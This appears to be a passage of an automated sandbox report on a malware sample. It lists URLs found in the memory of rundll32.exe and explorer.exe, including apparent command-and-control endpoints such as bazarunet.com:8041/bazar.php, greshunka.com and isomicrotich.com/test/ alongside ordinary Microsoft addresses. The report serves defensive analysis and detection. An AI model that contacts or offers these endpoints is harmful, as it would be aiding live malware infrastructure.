00000006.00000002.3806003596.0000016AD2824000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.c.lencr.org/0
Source: rundll32.exe, 00000006.00000003.2769645862.0000016AD28B2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2868000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788292595.0000016AD2853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2441139413.0000016AD28BE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1850989548.0000016AD2852000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529699566.0000016AD28C0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529789564.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1850989548.0000016AD2848000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2852000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD2824000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://x1.i.lencr.org/0
Source: explorer.exe, 00000009.00000000.1792832688.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2277712034.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3079591832.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
Source: explorer.exe, 00000009.00000003.2277712034.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1792832688.000000000913F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://android.notify.windows.com/iOS
Source: explorer.exe, 00000009.00000002.3811134225.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000009.00000002.3811134225.0000000008DB0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000009.00000003.2277712034.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1792832688.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3079591832.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 00000009.00000000.1791266554.0000000007276000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3808408882.0000000007276000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?t
Source: explorer.exe, 00000009.00000000.1792832688.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3079591832.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2277712034.0000000008DFE000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg
Source: rundll32.exe, 00000006.00000003.1558572897.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com/
Source: rundll32.exe, 00000006.00000003.2529789564.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1642587967.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1608485386.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529789564.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/
Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/%
Source: rundll32.exe, 00000006.00000003.2529789564.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/:
Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/C%m
Source: rundll32.exe, 00000006.00000003.1615547549.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1642587967.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1608485386.0000016AD2817000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/K%e
Source: rundll32.exe, 00000006.00000003.2529789564.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/P
Source: rundll32.exe, 00000006.00000003.1707394082.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1642587967.0000016AD281A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/W%
Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/Y
Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529789564.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529789564.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/admin.php
Source: rundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/admin.php;
Source: rundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/admin.php=
Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/admin.phpC
Source: rundll32.exe, 00000006.00000003.2529789564.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/admin.phpCryptography
Source: rundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/admin.phpI
Source: rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/admin.phpX
Source: rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/admin.phpn
Source: rundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/admin.phpow
Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/admin.phpwindowsupdate.comj
Source: rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/bazar.php
Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/bazar.php.
Source: rundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/bazar.php4
Source: rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/bazar.phpC
Source: rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/bazar.phpMM
Source: rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/bazar.phpQ
Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/bazar.phpR
Source: rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/bazar.phpT
Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/bazar.phpX
Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/bazar.phpl.mui
Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/bazar.phpm:8041/bazar.php
Source: rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/bazar.phps
Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/in.com:8041/
Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/net.com:8041/admin.php
Source: rundll32.exe, 00000006.00000003.1720996678.0000016AD2816000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/s%
Source: rundll32.exe, 00000006.00000003.2529789564.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/u
Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bazarunet.com:8041/zar.php
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
Source: explorer.exe, 00000009.00000002.3816713728.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1795302948.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://excel.office.com
Source: rundll32.exe, 00000006.00000003.2831885179.0000016AD2814000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com/
Source: rundll32.exe, 00000006.00000003.2831885179.0000016AD2814000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com/S%
Source: rundll32.exe, 00000006.00000003.2241985447.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/
Source: rundll32.exe, 00000006.00000003.3320385822.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529789564.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2241985447.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/admin.php
Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/admin.php4
Source: rundll32.exe, 00000006.00000003.3320385822.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/admin.phpV
Source: rundll32.exe, 00000006.00000003.1812614534.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/admin.phpx
Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3318968115.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/bazar.php
Source: rundll32.exe, 00000006.00000003.2769645862.0000016AD2884000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/bazar.php%
Source: rundll32.exe, 00000006.00000003.1788308588.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/bazar.php.
Source: rundll32.exe, 00000006.00000003.3320385822.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/bazar.php6
Source: rundll32.exe, 00000006.00000003.1788308588.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/bazar.phpe
Source: rundll32.exe, 00000006.00000002.3806003596.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://greshunka.com:8041/bazar.phpu
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1c9Jin.img
Source: explorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
Source: explorer.exe, 00000009.00000003.3074047960.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3073651112.000000000C58E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3816713728.000000000C596000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3078648933.000000000C4CC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.000000000913F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/
Source: explorer.exe, 00000009.00000003.3073651112.000000000C58E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/.7
Source: explorer.exe, 00000009.00000002.3811134225.000000000913F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/1n8J
Source: explorer.exe, 00000009.00000002.3811134225.000000000913F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/3
Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/5117-2476756634-1003
Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/5117-2476756634-1003J&
Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/N
Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/SIE
Source: explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/T
Source: explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.000000000913F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/r
Source: explorer.exe, 00000009.00000003.3074047960.000000000913F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/r5
Source: explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3081083635.000000000325F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3078648933.000000000C4CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/
Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3816713728.000000000C12D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/2476756634-1003
Source: explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/2476756634-1003j
Source: explorer.exe, 00000009.00000003.3081083635.000000000325F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/7
Source: explorer.exe, 00000009.00000002.3811134225.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/E
Source: explorer.exe, 00000009.00000003.3081083635.000000000325F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/MenuArray_151436-
Source: explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/O
Source: explorer.exe, 00000009.00000002.3805949216.0000000003256000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3081083635.000000000325F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/c
Source: explorer.exe, 00000009.00000003.3073651112.000000000C58E000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/hanced
Source: explorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/r
Source: explorer.exe, 00000009.00000003.3078648933.000000000C4CC000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/s
Source: explorer.exe, 00000009.00000002.3805851465.0000000003249000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://isomicrotich.com/test/z
Source: explorer.exe, 00000009.00000002.3810313194.00000000085CE000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://opewolumeras.com/test/
Source: explorer.exe, 00000009.00000002.3816713728.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1795302948.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000009.00000002.3816713728.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1795302948.000000000C091000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.com
Source: rundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1513808146.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1450359147.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://tiguanin.com/
